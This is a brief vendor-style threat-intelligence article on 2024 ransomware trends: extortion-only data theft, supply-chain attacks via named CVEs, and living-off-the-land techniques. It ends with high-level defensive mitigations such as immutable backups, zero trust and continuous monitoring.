The Evolution of Ransomware in 2024
The Evolution of Ransomware in 2024 (often abbreviated as CP-EVO) is exploring the latest trends in ransomware-as-a-service and how organizations can prepare for advanced extortion tactics. This development represents a significant shift in the Threat Intelligence landscape, affecting organizations globally.
Executive Summary
Ransomware has transitioned from simple opportunistic attacks to highly sophisticated, multi-stage extortion campaigns. In 2024, the "Ransomware-as-a-Service" (RaaS) model has matured, allowing even low-skilled threat actors to deploy advanced encryption and data exfiltration tools developed by top-tier criminal organizations such as LockBit 3.0 and ALPHV (BlackCat).
Key Trends in 2024
1. Data Exfiltration over Encryption
Many attackers are moving away from encrypting files—which can sometimes be recovered via backups—and instead focusing on "Extortion-only" attacks. They steal sensitive data and threaten to leak it publicly unless a ransom is paid, bypassing the need for complex encryption software that might be detected by modern EDR (Endpoint Detection and Response) systems. This increasingly triggers obligations under data privacy laws such as POPIA Section 22.
2. Targeting the Supply Chain
Instead of attacking a single company, actors are targeting software providers and service firms, often exploiting vulnerabilities like CVE-2023-46805 or CVE-2024-21887. By compromising one "hub" organization, they gain access to hundreds of downstream clients simultaneously.
3. Living off the Land (LotL)
Attackers are increasingly using legitimate administrative tools already present on a system (like PowerShell, WMI, or PsExec) to carry out their malicious activities. This makes detection significantly harder as no "malicious" files are ever actually downloaded to the disk.
Mitigation Strategies
- Immutable Backups: Ensure that backups cannot be deleted or modified even if administrative credentials are compromised.
- Zero Trust Architecture: Restrict lateral movement within the network so that a single compromised endpoint doesn't lead to a full-domain takeover. See our Zero Trust Architecture Guide for more details, or explore our ZTNA solutions.
- Continuous Monitoring: Implement 24/7 SOC monitoring to identify the early warning signs of exfiltration. AI-driven monitoring is particularly effective here.
- ISO Standards Alignment: Implementing frameworks like ISO/IEC 27001 helps structure incident response and risk management appropriately.